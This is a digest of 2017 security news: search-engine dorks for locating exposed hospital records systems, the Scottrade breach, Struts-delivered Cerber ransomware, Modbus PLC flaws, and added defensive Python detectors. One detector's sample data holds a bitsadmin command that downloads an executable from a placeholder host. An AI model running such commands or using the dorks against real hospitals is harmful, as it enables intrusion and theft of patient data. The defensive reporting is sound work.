The Mistakes of Smart Medicine
6.4.2017 Kaspersky Safety
As numerous studies have shown, smart houses, smart cars, and smart cities are undeniably beneficial to people in everyday life, but quite often can become a threat to their safety. It is not only a matter of personal data leakage. Just imagine that, for example, a smart refrigerator, affected by a third party at one point or another, would begin identifying expired products as fresh. There is yet another more dismal scenario: the system of a smart car turns the vehicle to the right at high speed, catching the driver unaware…

However, both existing and foreseeable threats that emerge from home IoT devices are only part of the problem related to the infrastructure around us becoming “smarter”. The technological boom in medicine has both encouraged medical institutions to process data exclusively in information systems and led to the emergence of new types of technological equipment and personal devices that can interact with traditional systems and networks. This means that the threats that are relevant for those systems and networks can also be relevant for medical systems.

Entry Points for Accessing Valuable Data

For the medical industry, the main attack vector is related to personal data and information on the health condition of patients. The first step in evaluating the security level for data is identifying entry points within the infrastructure of medical institutions where healthcare data can be collected, stored, and/or taken advantage of by an evildoer.

Possible entry points can be classified as follows:

information systems on the computer network of a medical institution (servers, workstations, admin panels for medical equipment, etc.) that access the Internet;
medical equipment that is connected to an enterprise network;
medical equipment that is not a network node but connects to a workstation (for example, via USB);
portable devices of patients (advanced fitness trackers, pacemakers and cardiac monitors, insulin pumps, etc.) and mobile devices that can track health indicators (mobile smartphones and smart watches);
other wireless information systems (Wi-Fi, Bluetooth, or RF), which can be mobile ECG devices, pulse oximeters, event monitors for tracking the medical condition of high-risk patients, and so on.
For the last three classes mentioned above, a detailed first-hand analysis of specific models related to these classes is required. It is for exactly this reason that those devices deserve an article of their own. For now, we will focus on devices and their components that do not require physical access and are frequently accessible from the Internet.

Portable Devices May Port Medical Histories

We’ve already written the following about the security of portable devices in March of 2015: “Just imagine, if a fitness tracker with a heart-rate monitor is hacked, then any shop owner will be able to track the heart rate of buyers as they look at discounts in the shop. The influence of advertisements on people can be learned in the same manner. Moreover, a hacked fitness tracker with a heart-rate monitor can be used as a lie detector.”

Owing to the increasing accuracy of sensors, gadgets that collect data on the health condition of their owners can potentially be used in serious ambulatory care to assess a patient’s health. However, the level of security for these gadgets has not been developing as fast as their capabilities.

[Image: Tracking vital signs with the help of mobile devices may become an integral part of ambulatory care in the near future]

Information that is collected by tracking vital signs can be used by both the owner of the device and the vendor of the infrastructure that the tracking app operates on. For users, the heart-rate parameter can signify that a certain activity should be decreased, specific medicines should be taken, etc., while vendors can send collected data to medical companies that can use it to assess the overall health of the client.

Thus, the main advantage of data collected by a gadget is not the depth of its analysis (any medical examination will yield more accurate results than readings from a fitness tracker) but the ability to evaluate changes in a patient’s health condition dynamically. Scenarios for using the information are limited by the imagination and enterprise of the owner, as well as by laws related to personal data.

If we look at the same piece of information from the perspective of a cybercriminal, the outlook for the owner of such a device is far less favorable: analysis of certain parameters (for example, heart rate, sleep quality, or average ADL score) allows a criminal to gain an overview of a victim’s health. Additional information may be provided by a gadget that is connected to the mobile device and is capable, for instance, of measuring the blood pressure or blood sugar levels of its user. After drawing conclusions about a victim’s ailments, an evildoer can provoke their aggravation.

Attacks to obtain health data can be divided into three basic types: those that violate data privacy, those that compromise data integrity, and those that attack data availability. Main vectors can be defined for each of those.

Types of attack that violate the privacy of medical data:

man-in-the-middle attacks on a sensor channel between the sensor and the service that stores the sensor’s data;
unauthorized access to local and remote data storage.
Types of attacks on data integrity:

unauthorized access to data storage with possible data substitution;
man-in-the-middle spoofing attacks on channels in order to substitute transmitted data;
modification (substitution) of data (spoofing attacks) and its transmission to consumers (such as a service that stores data or an app).
Attacks on availability:

ransomware attacks (encryption/deletion of user data).
Entry points for malicious code that commits theft or substitutes data on a mobile device depend on a specific combination of device and software.

Online Medical Data

Yet, I would like to review another entry point in detail – information systems on a medical institution’s network that are accessible from the Internet.

Medical institutions utilize automated healthcare data storage solutions, which store miscellaneous information about patients (diagnosis results, information about prescribed drugs, medical histories, etc.). The infrastructure of such a system may include various hardware and software components, which can be merged into data storage networks and can be accessible from the Internet in one form or another.

Several software packages used for storing healthcare data can serve as examples of entry points into medical infrastructure:

Hospital information systems (HISs) are software packages that control medical information coming from various sources, including the systems mentioned below.
Electronic Health Records (EHR) systems are dedicated software that enable storage of structured patient data and documentation of patient medical history.
Network-attached storage (NAS) refers to dedicated network storage devices, which can be both specialized devices for storing healthcare data or enterprise devices employed in the medical-institution
DICOM-compliant (Digital Imaging and Communications in Medicine) devices and PACS (picture archiving and communication system) servers are medical information systems based on the DICOM standard and include the following components:
a DICOM client, which is a medical device that is capable of transmitting data to a DICOM server;
a DICOM server, which is a hardware and software package that provides for the receipt and storage of data from clients (in particular, these devices can be PACS servers);
a DICOM diagnostic workstation and DICOM printers, both of which are hardware and software packages that are responsible for processing, visualizing, and printing medical images.
A key feature of the above-mentioned systems is a web interface (a web app) that is used to control them over the Internet. A web interface may have vulnerabilities that can be exploited by an evildoer, who can gain access to valuable information and processes. It is worth reviewing these systems in detail and verifying whether they are accessible from the Internet, i.e. if they are a potential entry point for evildoers.

Electronic Health Records (EHR)

In order to evaluate the number of apps that are available from the outside (from the Internet) and can work with EHR, a list of software employed in these tasks should be created and then a dork list should be organized. Dorks are special search-engine queries that are aimed at finding web components of required software among all of the resources indexed by a search engine.

Here is an example of a dork query that uses Google to search for the login form of EHR software components:

intitle:"<vendor_name> Login" & inurl:<vendor_name>

[Image: An example of a discovered web component (a login form) of software that is intended to work with EHR]

It should be noted that some of the resources found in the search results turned out to be traps for evildoers (honeypots). This fact alone indicates that analysts are seeking to track threats related to medical infrastructure. To check whether an identified resource is a honeypot, its IP address can be submitted to a dedicated service, HoneyScore, which examines a number of the resource’s attributes (for example, the hosting provider) and reaches a verdict on whether or not the resource is a honeypot. Nevertheless, a significant proportion of the discovered resources are real systems.

[Image: 126 discovered resources that meet the search criteria]

Each of the discovered web resources is a potential entry point that can be exploited by an evildoer to access the infrastructure. For example, many discovered systems lack protection against an exhaustive password search, which means that a criminal can use brute-force attacks. Then, by using a hacked account, the evildoer can gain privileged access to the system through the interface or find or exploit online vulnerabilities in order to access the system in the future.
[Image: An example of a discovered web interface for logging into an EHR system]

Hospital Information Systems (HISs)

A “hospital information system” is quite a vast notion that includes a set of methods and technologies for processing medical information. In our case, we are interested only in the HIS components that have a web interface for controlling and visualizing medical information.

Let’s consider the software of OpenEMR as an example. This software is used in medical institutions as a medical-data management solution, and it is certified by the Office of the National Coordinator for Health Information Technology (ONC). Some of its components are written in the PHP programming language, which means that a potential entry point for an evildoer can be a web server that maintains these OpenEMR components.

The next Google dork query returned 106 search results that meet the following criterion:

inurl:"/interface/login/login_frame.php" intitle:"Login" intext:"Username:"

After a quick analysis of the search results, it became obvious that components of the majority of the discovered OpenEMR systems have vulnerabilities, including some critical ones, which open up the OpenEMR database to compromise. Moreover, exploits for the discovered vulnerabilities are publicly available.

[Image: An example of a vulnerable HIS that was openly exposed]

For example, analyzing the different software versions revealed that vulnerability information had been published for the vast majority of the software versions installed on the hosts.

OpenEMR version                  Hosts (%)   Public exploits available
4.2.0                            31.4        Yes
4.1.2                            14.3        Yes
4.1.0                            11.4        Yes
4.2.1                             5.7        No
4.0.0                             5.7        Yes
4.1.1                             2.8        Yes
4.3.1-dev                         2.8        No
2.8.3                             2.8        Yes
3.2.0                             2.8        Yes
Proprietary (modified) version    8.5        –
Unknown version                  11.4        –

Network Attached Storage (NAS)

There are at least two types of NAS servers that have been used by medical institutions: dedicated “medical” NAS servers and common ones. While the former have strict security requirements for the data stored on them (for example, compliance with the Health Insurance Portability and Accountability Act), the security of the latter rests on the conscience of their developers and the medical institutions that use this type of NAS in their infrastructure. As a result, non-medical NAS may be left working without any updates for years and thus gather a great number of known vulnerabilities.

A list of dorks should be created to select NAS devices located in medical institutions out of all of the other devices indexed by search engines.

The next query is for the Censys search engine, which specializes in indexing devices with IP addresses and finds all of the devices (workstations, servers, routers, NAS servers, etc.) that belong to companies whose names contain words that directly or indirectly define these companies as medical institutions (“healthcare”, “clinic”, “hospital”, and “medical”):

autonomous_system.organization: (hospital or clinic or medical or healthcare)
[Image: The Censys search engine found approximately 21,278 hosts that are related to medical institutions]

The Censys report, which is shown below, lists the top 10 countries where these hosts are located.

Country              Hosts
United States       18,926
Canada               1,113
Iran                   441
Saudi Arabia           379
Republic of Korea      135
Australia               81
Thailand                33
United Kingdom          32
Puerto Rico             28
Vietnam                 27
Afterward, only the hosts that are FTP servers can be extracted from these search results. To do this, the search-engine query should be made more specific: for example, by searching only for hosts that have an open FTP port and whose banners contain the string “FTP” (the banner is the information that a server sends to a client when the client attempts to connect to its port):

(tags: ftp) and autonomous_system.organization: (health or clinic or medical or healthcare)

The search results displayed 1,094 hosts with operational FTP servers, which presumably belong to medical institutions.

Additionally, a list of vendor-specific NAS devices can be obtained from the narrowed-down search results. For this, the typical characteristics of a device must be known. These may be included in responses from services that are active on the device (for example, an FTP-server response to a connection attempt may contain the name of the device and its firmware version). The next query allows for selection of only those hosts that contain the “NAS” line in their banner (generally, several QNAP Systems models have this property) from all found hosts:

(metadata.description: nas) and autonomous_system.organization: (health or clinic or medical or healthcare)
[Image: The discovered QNAP Systems NAS servers that belong to medical organizations]

A vulnerable ProFTPd server release was installed on each of the discovered NAS devices, and information about exploits for this release is also publicly and easily accessible.

PACS Servers and DICOM Devices

The most common type of device that utilizes the DICOM format is the PACS server, which prints patient images that have been received from other DICOM devices.

It is possible to enter the following primitive query in the Shodan search engine to start searching for DICOM devices:

DICOM port:104

Accordingly, the search results will display hosts (mostly workstations and servers) that are used in medical institutions for storing and processing patient DICOM images.

[Image: The list of hosts that are used to process/store DICOM images]

Also, it might be worth searching for diagnostic DICOM workstations, which are dedicated PACS systems used for processing, diagnosing, and visualizing data. As an example, the following query for the Censys search engine can be used:

pacs and autonomous_system.organization: (hospital or clinic or medical or healthcare)

Analysis of the search results may reveal dedicated software for a diagnostic workstation.

[Image: The login forms of diagnostic workstations used for visualization of patient data]

Aside from that, the search results also contain admin panels used to access DICOM servers.

[Image: A login form for accessing a DICOM server]

Non-medical Systems with “Pathologies”

The systems described above handle valuable medical data. Therefore, security requirements for those systems must be high. However, let’s not forget that besides potential entry points, there are dozens of other points an evildoer can use that are not directly related to medical systems but are located in the infrastructure along with valuable data.

Here are several examples of non-medical systems that can be used as a potential entry point into a computer network with the goal of subsequently moving on to resources where medical information is stored:

any servers (web servers, FTP servers, e-mail servers, etc.) that are connected to the network of an institution and are accessible from the Internet;
a medical institution’s public Wi-Fi hotspots;
office printers;
video surveillance systems;
SCADA controllers;
automated systems for controlling mechanical and electrical components of a building (building management systems, BMS).
Each of the mentioned systems may have a vulnerability that can be taken advantage of by an evildoer in order to gain access to medical infrastructure.

For example, the prevalence of the Heartbleed vulnerability can be evaluated by entering the following query into the Censys search engine:

autonomous_system.organization: (hospital or clinic or medical or healthcare) and 443.https.heartbleed.heartbleed_vulnerable: 1

The search engine showed 66 hosts that met the criteria and were potentially vulnerable to Heartbleed, and this was long after the vulnerability and its dangers had been given wide coverage by the mass media. Generally speaking, when referring to Heartbleed, it should be noted that the problem is global in nature: according to a report by the founder of Shodan, approximately 200,000 websites still remain vulnerable.

Stay Healthy

In order to keep evildoers from stealing medical data from institutions, we recommend, in addition to the essential security measures typical for enterprise infrastructure, doing the following:

exclude from external access all of the information systems that process medical data or any other patient-related data;
all of the medical equipment that connects to a workstation (or is a network node) should be isolated in a dedicated segment, while the operational parameters of the equipment can be modified by using the workstation (or remotely);
any online information systems should be isolated in a “demilitarized” zone or completely excluded from an enterprise network;
continuously monitor medical-system software for updates and update software regularly;
change default passwords that are set up for the login forms of medical systems and delete unwanted accounts from the database (for example, test accounts);
create strong passwords for all accounts.


Scottrade Bank admits a data breach that potentially exposed 20,000 customers’ records
6.4.2017 securityaffairs CyberCrime

Scottrade Bank confirmed that a technical incident exposed 20,000 customer records. A 60GB MSSQL database was accidentally left open online.
It is official: Scottrade Bank suffered a data breach that affected thousands of its customers.

Online brokerage Scottrade has admitted the data breach for sensitive loan applications from roughly 20,000 customers.


The incident occurred when IT services company Genpact uploaded the sensitive data to an Amazon-hosted server. Unfortunately, the company didn’t protect the archive, leaving it exposed online without any protection.

The incident was discovered by the popular security expert Chris Vickery, who is well known for having discovered many other databases left online without protection. Vickery found the archive and downloaded the 158.9GB Microsoft SQL database, then decided to report the issue to Scottrade.

According to Vickery, the archive contains account passwords in plain text, and the exposed records include names, addresses and social security numbers.

Chris Vickery (@VickerySec) tweeted on 2 Apr 2017: “Large MSSQL db fully loaded. It's as bad as I expected. Bank-related. Plaintext passwords. Big name company. I've reached out to them.”
Scottrade promptly started an investigation and discovered the root cause of the incident: a Genpact employee had not properly configured the SQL server.

“On April 2, Genpact, a third party vendor, confirmed that it had uploaded a data set to one of its cloud servers that did not have all security protocols in place. As a result, the data was not fully secured for a period of time. The file contained commercial loan application information of a small B2B unit within Scottrade Bank, including non-public information of as many as 20,000 individuals and businesses.” reads the official statement issued by Scottrade. “Upon being alerted to the issue, Genpact immediately secured that information, and traced the issue to a configuration error on their part while uploading the file.”

The archive was removed from the Internet immediately after the breach notification.

The service provider Genpact is investigating the incident to determine what data was exposed.

“Genpact is undertaking an extensive analysis of the log files and the environment to determine to what extent the data may have been accessed. It has engaged a leading forensics firm to assist in the analysis.” continues the statement.

Genpact and Scottrade confirmed that the incident was not caused by a cyber attack against the internal servers of either company.

Scottrade had already suffered a data breach in the past: in October 2015, an incident exposed the personal information of 4.6 million customers.


Apache Struts Flaw Used to Deliver Cerber Ransomware

6.4.2017 securityweek Virus
A recently patched Apache Struts 2 vulnerability has been exploited by cybercriminals to deliver Cerber ransomware to Windows systems, researchers warned.

The flaw, tracked as CVE-2017-5638, can be exploited for remote code execution. Malicious actors started exploiting the vulnerability to deliver malware shortly after a patch was made available and a proof-of-concept (PoC) exploit was released.

In many cases, attackers targeted Unix systems with backdoors and distributed denial-of-service (DDoS) bots, but recently experts also spotted a campaign targeting Windows machines.

In the week of March 20, researchers at F5 Networks started seeing attacks delivering Cerber ransomware to Windows servers. Experts at the SANS Technology Institute also reported seeing these attacks on Wednesday.

Cybercriminals have used the exploit to execute shell commands and run BITSAdmin and other command-line tools shipped with Windows. These tools are used to download and execute the Cerber malware.
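The delivery chain described above (Struts RCE, a shell command, then BITSAdmin fetching the payload) leaves a recognizable parent/child process pattern. The following detection logic is an added example written for this article, not code from F5, SANS or the Struts project; it assumes Sysmon-style process-creation events in JSON lines, that the Struts application runs under java.exe/javaw.exe, and it uses constructed sample events rather than real telemetry.

```python
import json
import ntpath
from typing import Dict, List

# Assumed: the JVM hosting the Struts application (adjust to the real service image).
WEB_SERVER_IMAGES = {"java.exe", "javaw.exe"}
# Windows built-in tools the article says were used to fetch and run the payload.
LOLBIN_IMAGES = {"bitsadmin.exe", "cmd.exe"}
# How far up the process tree to walk when looking for a web-server ancestor.
MAX_DEPTH = 5

# Constructed Sysmon-like events (JSON lines); not real telemetry. The first three
# mirror the article's chain, the last three are an administrator's benign session.
SAMPLE_EVENTS = r"""
{"ProcessId": 1880, "ParentProcessId": 700, "Image": "C:\\Program Files\\Java\\jre\\bin\\java.exe", "CommandLine": "java -jar struts-app.war"}
{"ProcessId": 4120, "ParentProcessId": 1880, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c bitsadmin /transfer dl http://example.invalid/x.exe C:\\Windows\\Temp\\x.exe"}
{"ProcessId": 4188, "ParentProcessId": 4120, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /transfer dl http://example.invalid/x.exe C:\\Windows\\Temp\\x.exe"}
{"ProcessId": 900, "ParentProcessId": 600, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}
{"ProcessId": 5000, "ParentProcessId": 900, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"}
{"ProcessId": 5100, "ParentProcessId": 5000, "Image": "C:\\Windows\\System32\\bitsadmin.exe", "CommandLine": "bitsadmin /list"}
"""


def parse_events(text: str) -> Dict[int, dict]:
    """Index JSON-lines process-creation events by ProcessId.

    Real Sysmon data should be keyed by ProcessGuid/ParentProcessGuid instead,
    because PIDs are reused over time; the integer key here is for the sample only.
    """
    events: Dict[int, dict] = {}
    for line in text.splitlines():
        line = line.strip()
        if line:
            event = json.loads(line)
            events[event["ProcessId"]] = event
    return events


def image_name(path: str) -> str:
    """Lower-case executable name from a Windows path."""
    return ntpath.basename(path).lower()


def ancestry(events: Dict[int, dict], pid: int, max_depth: int = MAX_DEPTH) -> List[str]:
    """Image names from the process up through its known ancestors, nearest first."""
    chain: List[str] = []
    seen = set()
    while pid in events and pid not in seen and len(chain) <= max_depth:
        seen.add(pid)
        chain.append(image_name(events[pid]["Image"]))
        pid = events[pid]["ParentProcessId"]
    return chain


def find_webserver_spawned_tools(events: Dict[int, dict]) -> List[dict]:
    """Flag cmd.exe/bitsadmin.exe processes that descend from the web-server JVM."""
    findings = []
    for pid, event in sorted(events.items()):
        if image_name(event["Image"]) not in LOLBIN_IMAGES:
            continue
        chain = ancestry(events, pid)
        # chain[0] is the tool itself; any web-server image above it is suspicious.
        if any(parent in WEB_SERVER_IMAGES for parent in chain[1:]):
            findings.append({
                "pid": pid,
                "chain": " -> ".join(reversed(chain)),
                "command": event["CommandLine"],
            })
    return findings


if __name__ == "__main__":
    for hit in find_webserver_spawned_tools(parse_events(SAMPLE_EVENTS)):
        print(f"pid {hit['pid']}: {hit['chain']}\n    {hit['command']}")
```

The benign administrator chain (explorer.exe -> cmd.exe -> bitsadmin.exe) is not flagged, only the two processes descending from java.exe.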

The ransomware encrypts important files found on the system and demands money in return for the “special decryption software” needed to recover the files.

The Bitcoin address where victims are instructed to send the ransom is the same across multiple campaigns. F5 Networks reported seeing 84 bitcoins, currently worth nearly $100,000, in that address.

“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”

AT&T vulnerable to Apache Struts exploit

The Apache Struts vulnerability has been found to affect many products, including ones from Cisco and VMware.

Independent security researcher Corben Douglas reported on Wednesday that he tested AT&T systems roughly 4-5 days after the exploit was released and they had been vulnerable to attacks. The expert said he managed to execute commands on AT&T servers, which could have allowed him to “pwn” the company.


Mozilla Wants 64 Bits of Entropy in Certificate Serial Numbers

6.4.2017 securityweek Security
Mozilla this week announced an update to its CA Certificate Policy, which now requires the use of 64 bits of entropy in certificate serial numbers.

The change was included in Mozilla’s CA Certificate Policy 2.4.1, and arrives nearly one year after the CA/Browser Forum adopted Ballot 164, which required Certificate Authorities to use greater randomization when issuing certificates, to mitigate collision attacks and make preimage attacks more difficult.

The ballot also proposed replacing the “entropy” wording with a requirement for output from a cryptographically secure pseudo-random number generator (CSPRNG). Thus, Section 7.1 of the Baseline Requirements was modified to “Effective September 30, 2016, CAs SHALL generate Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.”

The change was proposed after it was demonstrated that hash collisions can allow attackers to forge a signature on a certificate of their choosing, and that adding random bits effectively doubles the security level of a hash function. While adding random bits had been encouraged before, the ballot made it a requirement.
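What the new rule means in practice, as an added example (not Mozilla's or the CA/Browser Forum's code): a serial-number generator that draws the required bits from a CSPRNG and keeps the value positive, plus a linter that checks the conditions a relying party can actually verify from a certificate (greater than zero, at most 20 DER octets per RFC 5280, and enough significant bits to plausibly hold 64 bits of CSPRNG output). The linter cannot prove randomness, so a short serial is reported as a warning rather than a failure.

```python
import secrets
from typing import Tuple

# CA/Browser Forum Ballot 164 (BR section 7.1): serial numbers must be greater than
# zero and contain at least 64 bits of CSPRNG output.
MIN_RANDOM_BITS = 64
# RFC 5280 section 4.1.2.2: the serialNumber INTEGER content must fit in 20 octets.
MAX_SERIAL_OCTETS = 20


def der_integer_content(value: int) -> bytes:
    """Minimal two's-complement content octets of a DER INTEGER (non-negative values)."""
    if value < 0:
        raise ValueError("negative serial numbers are not permitted")
    # One extra bit for the sign, rounded up to whole octets: 0x80 encodes as 00 80.
    octets = (value.bit_length() + 8) // 8
    return value.to_bytes(octets, "big")


def generate_serial(random_bits: int = MIN_RANDOM_BITS) -> int:
    """Build a positive serial number carrying `random_bits` bits of CSPRNG output.

    A fixed leading 1 bit is placed above the random bits, so the serial always has
    random_bits + 1 significant bits and is never zero or negative, even when the
    random bits begin with zeros. The fixed bit contributes no entropy and is not
    counted toward random_bits.
    """
    if random_bits < MIN_RANDOM_BITS:
        raise ValueError(f"at least {MIN_RANDOM_BITS} random bits are required")
    serial = (1 << random_bits) | secrets.randbits(random_bits)
    if len(der_integer_content(serial)) > MAX_SERIAL_OCTETS:
        raise ValueError("serial would not fit in 20 DER octets")
    return serial


def check_serial(serial: int) -> Tuple[str, str]:
    """Lint a serial number against the post-Ballot-164 rules.

    Returns ("fail", reason), ("warn", reason) or ("pass", reason). The bit-length
    test is only a necessary condition: a compliant CA that used exactly 64 random
    bits produces a shorter value whenever those bits start with zeros, so a short
    serial is a warning, not proof of a non-compliant generator.
    """
    if serial <= 0:
        return "fail", "serial number must be greater than zero"
    content = der_integer_content(serial)
    if len(content) > MAX_SERIAL_OCTETS:
        return "fail", f"DER content is {len(content)} octets; RFC 5280 allows at most 20"
    if serial.bit_length() < MIN_RANDOM_BITS:
        return "warn", (f"only {serial.bit_length()} significant bits; 64 bits of CSPRNG "
                        "output would normally produce a longer value")
    return "pass", f"{serial.bit_length()} significant bits, {len(content)} DER octets"


if __name__ == "__main__":
    # Constructed samples: a pre-ballot sequential counter, zero, and a fresh serial.
    for candidate in (1234, 0, generate_serial()):
        status, reason = check_serial(candidate)
        print(f"{candidate:#x}: {status} ({reason})")
```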

The updated CA Certificate Policy also states that CP and CPS documents now need to be submitted to Mozilla each year, in addition to audit statements, and that these documents need to be provided in English starting June 1, 2017. The company also updated the applicable versions of some audit criteria.

Mozilla also notes that submitted documentation must be openly licensed and that the Common CCADB Policy and the Mozilla CCADB Policy are incorporated by reference in Mozilla’s CA Certificate Policy version. Further, the new Common CA Database (CCADB) Policy makes official a number of existing expectations regarding the CCADB, and there are additional requirements on OCSP responses, the company says.

The organization has already sent the CA Communication to the Primary Point of Contact (POC) for each CA and asked them to respond to 14 action items. Additionally, there are discussions in the mozilla.dev.security.policy forum about upcoming changes, questions and clarifications about policy and expectations, and root certificate inclusion/change requests, to which CAs are invited to contribute.

“With this CA Communication, we re-iterate that participation in Mozilla’s CA Certificate Program is at our sole discretion, and we will take whatever steps are necessary to keep our users safe. Nevertheless, we believe that the best approach to safeguard that security is to work with CAs as partners, to foster open and frank communication, and to be diligent in looking for ways to improve,” the company said.


"Philadelphia" Ransomware Targets Healthcare Industry

6.4.2017 securityweek Virus
A newly observed ransomware family is being used in attacks against organizations in the healthcare industry, Forcepoint security researchers reveal.

Dubbed Philadelphia, the malware is a variant of the Stampado malware that emerged last year as one of the cheapest ransomware families available for would-be cybercriminals. It was being offered at only $39 for a lifetime license, much less than what other threats sold via the ransomware-as-a-service (RaaS) business model cost. An ad for Philadelphia was spotted last month on YouTube.

The Philadelphia ransomware, Forcepoint says, appears to be distributed via spear-phishing emails that contain a shortened URL, and has already been used to infect a hospital in Oregon and Southwest Washington. The link redirects to a personal storage site that serves a malicious DOCX file containing the targeted healthcare organization's logo to give it an increased sense of legitimacy.

The file includes three document icons allegedly pertaining to patient information, and the intended victim is encouraged to click on any of them. However, once that happens, a malicious JavaScript is triggered to download and execute the Philadelphia ransomware.

After installation, the malware communicates with its command and control (C&C) server to check in. It sends various details on the infected system, including operating system, username, country, and system language, and the C&C responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

Next, the malware starts encrypting user files using AES-256 encryption. Once the process has been completed, the ransomware displays a window informing users that their files have been encrypted and urging them to pay 0.3 Bitcoins to a specific address.

According to Forcepoint, not only did the cybercriminals use a tailored bait targeting a specific healthcare organization in their attack, but the encrypted JavaScript they used contained the string “hospitalspam” in its directory path. Moreover, the C&C server also contained “hospital/spam” in its path.

This would suggest that the actor is specifically targeting hospitals using spear phishing emails for distribution, the researchers say. The campaign supposedly started in the third week of March.

“Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,” Forcepoint concludes.


PLCs From Several Vendors Vulnerable to Replay Attacks

6.4.2017 securityweek ICS
Programmable logic controllers (PLCs) from several major vendors are affected by implementation flaws that can be exploited by attackers to execute arbitrary commands on the vulnerable devices, researchers warned.

The vulnerabilities, identified by ICS security firm CRITIFENCE, are related to the Modbus communications protocol, which is often used for connecting industrial devices. The company has been criticized for leading people to believe that ransomware attacks leveraging the flaws had already been spotted in the wild.

According to CRITIFENCE, devices from several companies are vulnerable to attacks, including Schneider Electric, GE and Rockwell Automation’s Allen-Bradley.

For the time being, only Schneider addressed the problem and the advisory published by the security firm focuses on Schneider products. ICS-CERT and other affected vendors have been notified.

In the case of Schneider, the vulnerabilities affect Modicon PLCs. The company has not released any firmware updates, but pointed out that some of its products already include protection mechanisms for these types of attacks, and provided mitigation advice for devices that don’t have any built-in protections.

CRITIFENCE said in its advisory that attacks are possible against Schneider PLCs due to two vulnerabilities: CVE-2017-6034 and CVE-2017-6032. An attacker who has access to the OT network can intercept traffic going to the targeted PLC, including the session identifier needed to send administrative commands to the device.

Once they obtain the session key, which is transmitted in clear text, attackers can replay the request and add arbitrary commands, including for starting and stopping the PLC, and downloading its ladder diagram.

CRITIFENCE has published a proof-of-concept (PoC) exploit showing how a remote attacker can execute arbitrary commands on a Schneider PLC. The company believes these types of flaws can be exploited in ransomware-style attacks where hackers threaten to wipe ladder diagrams from PLCs unless their demands are met.

This attack scenario, dubbed “ClearEnergy” by CRITIFENCE, has drawn criticism from some ICS security experts. CRITIFENCE initially led readers to believe that ClearEnergy attacks had actually been spotted in the wild, with a news article titled “ClearEnergy ransomware aim to destroy process automation logics in critical infrastructure, SCADA and industrial control systems.” The company later clarified that it was only a PoC ransomware attack.
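Since Modbus/TCP gives a defender no authentication to lean on, the practical control on the wire is restricting which hosts may send anything other than read requests to a PLC. The following passive audit is an added example written for this digest; it is not CRITIFENCE's PoC, Schneider code, or any vendor tooling. The sample frames, the unit id, and the engineering-workstation allowlist are constructed for the demo.

```python
"""Passive Modbus/TCP audit: flag control traffic from hosts that are not
allowed to send it.  Added illustration, not code from CRITIFENCE or a vendor.
Modbus/TCP has no authentication or encryption, so *who* sends which function
code is the only policy enforceable on the wire.  Frames below are constructed."""
import struct
from typing import NamedTuple, Optional, Set

# MBAP header: transaction id, protocol id (0 = Modbus), length, unit id.
MBAP = struct.Struct(">HHHB")

# Public function codes that only read state from the device.
READ_ONLY_FC = {1, 2, 3, 4, 7, 11, 12, 17, 20, 24}
# Public function codes that write coils, registers or file records.
WRITE_FC = {5, 6, 15, 16, 21, 22, 23}
# Ranges the Modbus spec reserves for user-defined (vendor) functions; vendors
# carry engineering traffic such as start/stop or program transfer here.
USER_DEFINED = [(65, 72), (100, 110)]


class Frame(NamedTuple):
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes


def parse_modbus_tcp(payload: bytes) -> Frame:
    """Parse one Modbus/TCP ADU; raise ValueError if it is malformed."""
    if len(payload) < MBAP.size + 1:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, proto, length, unit = MBAP.unpack_from(payload)
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    # 'length' counts the unit id plus the PDU, i.e. everything after byte 6.
    if length != len(payload) - 6:
        raise ValueError(f"length field {length} does not match frame size")
    return Frame(tid, unit, payload[7], payload[8:])


def classify(fc: int) -> str:
    """Bucket a function code by what it can do to the device."""
    if fc & 0x80:
        return "exception-response"
    if fc in READ_ONLY_FC:
        return "read"
    if fc in WRITE_FC:
        return "write"
    if any(lo <= fc <= hi for lo, hi in USER_DEFINED):
        return "user-defined"
    return "unassigned"


def audit(src_ip: str, payload: bytes, engineering_hosts: Set[str]) -> Optional[str]:
    """Return an alert for a frame src_ip should not be sending, else None."""
    try:
        frame = parse_modbus_tcp(payload)
    except ValueError as err:
        return f"MALFORMED from {src_ip}: {err}"
    kind = classify(frame.function_code)
    if kind in ("read", "exception-response") or src_ip in engineering_hosts:
        return None
    return (f"ALERT {kind} function code {frame.function_code} to unit "
            f"{frame.unit_id} from non-engineering host {src_ip}")


# Constructed sample frames (not captured traffic).
READ_HOLDING = bytes.fromhex("0001 0000 0006 01 03 0000 000a")  # FC 3, 10 registers
WRITE_COIL = bytes.fromhex("0002 0000 0006 01 05 0000 ff00")    # FC 5, coil 0 on
VENDOR_CMD = bytes.fromhex("0003 0000 0004 01 46 0001")         # FC 70, user-defined
TRUNCATED = bytes.fromhex("0004 0000 0006 01")                  # header only, no PDU

ENGINEERING = {"10.10.1.5"}  # assumed engineering workstation allowed to write

if __name__ == "__main__":
    for src, frame in [("10.10.1.5", WRITE_COIL), ("10.10.9.77", WRITE_COIL),
                       ("10.10.9.77", READ_HOLDING), ("10.10.9.77", VENDOR_CMD),
                       ("10.10.9.77", TRUNCATED)]:
        print(src, audit(src, frame, ENGINEERING))
```

The check catches a rogue host issuing writes or vendor-specific engineering commands, but it cannot see the attack described above when the replay comes from an allowed engineering host with a stolen session identifier; that case is exactly why the vendor's protection mechanisms and strict segmentation of the OT network matter.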


Microsoft Details Data Collection in Windows 10 Creators Update

6.4.2017 securityweek Privacy
Microsoft on Wednesday revealed details of the data that the next major Windows 10 version, set to arrive next week, will collect from computers.

Ever since first announcing Windows 10, the tech giant faced criticism for collecting a large amount of data on the usage of the platform and applications. In July 2016, France served notice to Microsoft to stop collecting excessive user data without consent on civil liberty grounds.

